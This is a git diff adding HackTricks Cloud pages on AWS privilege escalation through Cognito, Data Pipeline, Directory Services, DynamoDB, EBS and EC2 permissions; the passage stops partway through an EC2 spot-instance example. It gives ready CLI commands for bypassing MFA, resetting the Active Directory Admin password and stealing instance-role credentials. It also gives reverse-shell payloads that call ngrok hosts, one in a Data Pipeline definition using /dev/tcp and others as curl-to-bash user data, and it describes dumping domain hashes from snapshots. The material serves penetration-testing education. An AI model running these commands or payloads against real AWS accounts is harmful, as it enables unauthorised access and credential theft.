+    [--sms-mfa-settings <value>] \
+    [--software-token-mfa-settings <value>] \
+    --username <value> \
+    --user-pool-id <value>
+```
+
+**SetUserPoolMfaConfig**: Similar to the previous one this permission can be used to set MFA preferences of a user pool to bypass the MFA protection.
+
+```bash
+aws cognito-idp set-user-pool-mfa-config \
+    --user-pool-id <value> \
+    [--sms-mfa-configuration <value>] \
+    [--software-token-mfa-configuration <value>] \
+    [--mfa-configuration <value>]
+```
+
+**UpdateUserPool:** It's also possible to update the user pool to change the MFA policy. [Check cli here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html).
+
+**Potential Impact:** Indirect privesc to potentially any user the attacker knows the credentials of, this could allow to bypass the MFA protection.
+
+### `cognito-idp:AdminUpdateUserAttributes`
+
+An attacker with this permission could change the email or phone number or any other attribute of a user under his control to try to obtain more privileges in an underlaying application.\
+This allows to change an email or phone number and set it as verified.
+
+```bash
+aws cognito-idp admin-update-user-attributes \
+    --user-pool-id <value> \
+    --username <value> \
+    --user-attributes <value>
+```
+
+**Potential Impact:** Potential indirect privesc in the underlying application using Cognito User Pool that gives privileges based on user attributes.
+
+### `cognito-idp:CreateUserPoolClient` | `cognito-idp:UpdateUserPoolClient`
+
+An attacker with this permission could **create a new User Pool Client less restricted** than already existing pool clients. For example, the new client could allow any kind of method to authenticate, don't have any secret, have token revocation disabled, allow tokens to be valid for a longer period...
+
+The same can be be don if instead of creating a new client, an **existing one is modified**.
+
+In the [**command line**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (or the [**update one**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) you can see all the options, check it!.
+
+```bash
+aws cognito-idp create-user-pool-client \
+    --user-pool-id <value> \
+    --client-name <value> \
+    [...]
+```
+
+**Potential Impact:** Potential indirect privesc to the Identity Pool authorized user used by the User Pool by creating a new client that relax the security measures and makes possible to an attacker to login with a user he was able to create.
+
+### `cognito-idp:CreateUserImportJob` | `cognito-idp:StartUserImportJob`
+
+An attacker could abuse this permission to create users y uploading a csv with new users.
+
+```bash
+# Create a new import job
+aws cognito-idp create-user-import-job \
+    --job-name <value> \
+    --user-pool-id <value> \
+    --cloud-watch-logs-role-arn <value>
+
+# Use a new import job
+aws cognito-idp start-user-import-job \
+    --user-pool-id <value> \
+    --job-id <value>
+
+# Both options before will give you a URL where you can send the CVS file with the users to create
+curl -v -T "PATH_TO_CSV_FILE" \
+    -H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
+```
+
+(In the case where you create a new import job you might also need the iam passrole permission, I haven't tested it yet).
+
+**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user.
+
+### `cognito-idp:CreateIdentityProvider` | `cognito-idp:UpdateIdentityProvider`
+
+An attacker could create a new identity provider to then be able to **login through this provider**.
+
+```bash
+aws cognito-idp create-identity-provider \
+    --user-pool-id <value> \
+    --provider-name <value> \
+    --provider-type <value> \
+    --provider-details <value> \
+    [--attribute-mapping <value>] \
+    [--idp-identifiers <value>]
+```
+
+**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user.
+
+### cognito-sync:\* Analysis
+
+This is a very common permission by default in roles of Cognito Identity Pools. Even if a wildcard in a permissions always looks bad (specially coming from AWS), the **given permissions aren't super useful from an attackers perspective**.
+
+This permission allows to read use information of Identity Pools and Identity IDs inside Identity Pools (which isn't sensitive info).\
+Identity IDs might have [**Datasets**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) assigned to them, which are information of the sessions (AWS define it like a **saved game**). It might be possible that this contain some kind of sensitive information (but the probability is pretty low). You can find in the [**enumeration page**](../aws-services/aws-cognito-enum/) how to access this information.
+
+An attacker could also use these permissions to **enroll himself to a Cognito stream that publish changes** on these datases or a **lambda that triggers on cognito events**. I haven't seen this being used, and I wouldn't expect sensitive information here, but it isn't impossible.
+
+### Automatic Tools
+
+* [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+
+For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+
+#### Usage
+
+Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
+
+```bash
+Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools 
+us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 
+59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
+```
+
+Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
+
+```bash
+Pacu (new:test) > run cognito__enum
+```
+
+* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation.
+
+#### Installation
+
+```bash
+$ pip install cognito-scanner
+```
+
+#### Usage
+
+```bash
+$ cognito-scanner --help
+```
+
+For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
new file mode 100644
index 0000000000..4e5b80724b
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
@@ -0,0 +1,100 @@
+# AWS - Datapipeline Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## datapipeline
+
+For more info about datapipeline check:
+
+{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %}
+[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md)
+{% endcontent-ref %}
+
+### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`
+
+Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:**
+
+```bash
+aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
+```
+
+After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:
+
+```json
+{
+     "objects": [
+     {
+         "id" : "CreateDirectory",
+         "type" : "ShellCommandActivity",
+         "command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
+         "runsOn" : {"ref": "instance"}
+     },
+     {
+         "id": "Default",
+         "scheduleType": "ondemand",
+         "failureAndRerunMode": "CASCADE",
+         "name": "Default",
+         "role": "assumable_datapipeline",
+         "resourceRole": "assumable_datapipeline"
+     },
+     {
+         "id" : "instance",
+         "name" : "instance",
+         "type" : "Ec2Resource",
+         "actionOnTaskFailure" : "terminate",
+         "actionOnResourceFailure" : "retryAll",
+         "maximumRetries" : "1",
+         "instanceType" : "t2.micro",
+         "securityGroups" : ["default"],
+         "role" : "assumable_datapipeline",
+         "resourceRole" : "assumable_ec2_profile_instance"
+     }]
+}
+```
+
+{% hint style="info" %}
+Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**.
+
+Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).
+{% endhint %}
+
+```bash
+aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
+    --pipeline-definition file:///pipeline/definition.json
+```
+
+The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.
+
+**Potential Impact:** Direct privesc to the ec2 service role specified.
+
+## References
+
+* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
new file mode 100644
index 0000000000..33898f0482
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
@@ -0,0 +1,60 @@
+# AWS - Directory Services Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Directory Services
+
+For more info about directory services check:
+
+{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %}
+[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md)
+{% endcontent-ref %}
+
+### `ds:ResetUserPassword`
+
+This permission allows to **change** the **password** of any **existent** user in the Active Directory.\
+By default, the only existent user is **Admin**.
+
+```
+aws ds reset-user-password --directory-id <id> --user-name Admin --new-password Newpassword123.
+```
+
+### AWS Management Console
+
+It's possible to enable an **application access URL** that users from AD can access to login:
+
+<figure><img src="../../../.gitbook/assets/image (244).png" alt=""><figcaption></figcaption></figure>
+
+And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console:
+
+<figure><img src="../../../.gitbook/assets/image (155).png" alt=""><figcaption></figcaption></figure>
+
+There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
new file mode 100644
index 0000000000..3fedf519ad
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
@@ -0,0 +1,49 @@
+# AWS - DynamoDB Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## dynamodb
+
+For more info about dynamodb check:
+
+{% content-ref url="../aws-services/aws-dynamodb-enum.md" %}
+[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**:
+
+{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %}
+[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md)
+{% endcontent-ref %}
+
+### TODO: Read data abusing data Streams
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
new file mode 100644
index 0000000000..29cc69d951
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
@@ -0,0 +1,53 @@
+# AWS - EBS Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EBS
+
+### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots`
+
+An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in:
+
+{% content-ref url="../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md" %}
+[aws-ebs-snapshot-dump.md](../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md)
+{% endcontent-ref %}
+
+Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags`
+
+The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**.
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords).
+
+### **`ec2:CreateSnapshot`**
+
+Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
+
+You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
new file mode 100644
index 0000000000..678a7bdf35
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
@@ -0,0 +1,335 @@
+# AWS - EC2 Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EC2
+
+For more **info about EC2** check:
+
+{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %}
+[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/)
+{% endcontent-ref %}
+
+### `iam:PassRole`, `ec2:RunInstances`
+
+An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint.
+
+* **Access via SSH**
+
+Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`).
+
+```bash
+aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
+    --iam-instance-profile Name=<instance-profile-name> --key-name <ssh-key> \
+    --security-group-ids <sg-id>
+```
+
+* **Access via rev shell in user data**
+
+You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way.
+
+```bash
+echo '#!/bin/bash
+curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh
+
+aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
+   --iam-instance-profile Name=E<instance-profile-name> \
+   --count 1 \
+   --user-data "file:///tmp/rev.sh"
+```
+
+Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance:
+
+{% content-ref url="../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md" %}
+[aws-guardduty-enum.md](../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md)
+{% endcontent-ref %}
+
+**Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles.
+
+#### Privesc to ECS
+
+With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**.
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 run-instances \
+    --image-id ami-07fde2ae86109a2af \
+    --instance-type t2.micro \
+    --iam-instance-profile <ECS_role> \
+    --count 1 --key-name pwned \
+    --user-data "file:///tmp/asd.sh" 
+
+# Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs)
+# The EC2 instance profile needs basic ECS access
+# The content of the user data is:
+#!/bin/bash
+echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;
+```
+{% endcode %}
+
+To learn how to **force ECS services to be run** in this new EC2 instance check:
+
+{% content-ref url="aws-ecs-privesc.md" %}
+[aws-ecs-privesc.md](aws-ecs-privesc.md)
+{% endcontent-ref %}
+
+If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack.
+
+**Potential Impact:** Direct privesc to ECS roles attached to tasks.
+
+### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`**
+
+Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\
+As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**.
+
+{% code overflow="wrap" %}
+```bash
+# Removing role from instance profile
+aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>
+
+# Add role to instance profile
+aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>
+```
+{% endcode %}
+
+If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:**
+
+* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \*
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
+```
+{% endcode %}
+
+**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).
+
+### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`)
+
+With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it.
+
+* If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \*
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
+aws ec2 disassociate-iam-instance-profile --association-id <value>
+aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
+```
+{% endcode %}
+
+* or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \*
+
+{% code overflow="wrap" %}
+````
+```bash
+aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>
+```
+````
+{% endcode %}
+
+**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).
+
+### `ec2:RequestSpotInstances`,`iam:PassRole`
+
+An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\
+Once the instance is run, he can **steal the IAM role**.
+
+{% code overflow="wrap" %}
+```bash
+REV=$(printf '#!/bin/bash
+curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
+' | base64)
+
+aws ec2 request-spot-instances \
+   --instance-count 1 \
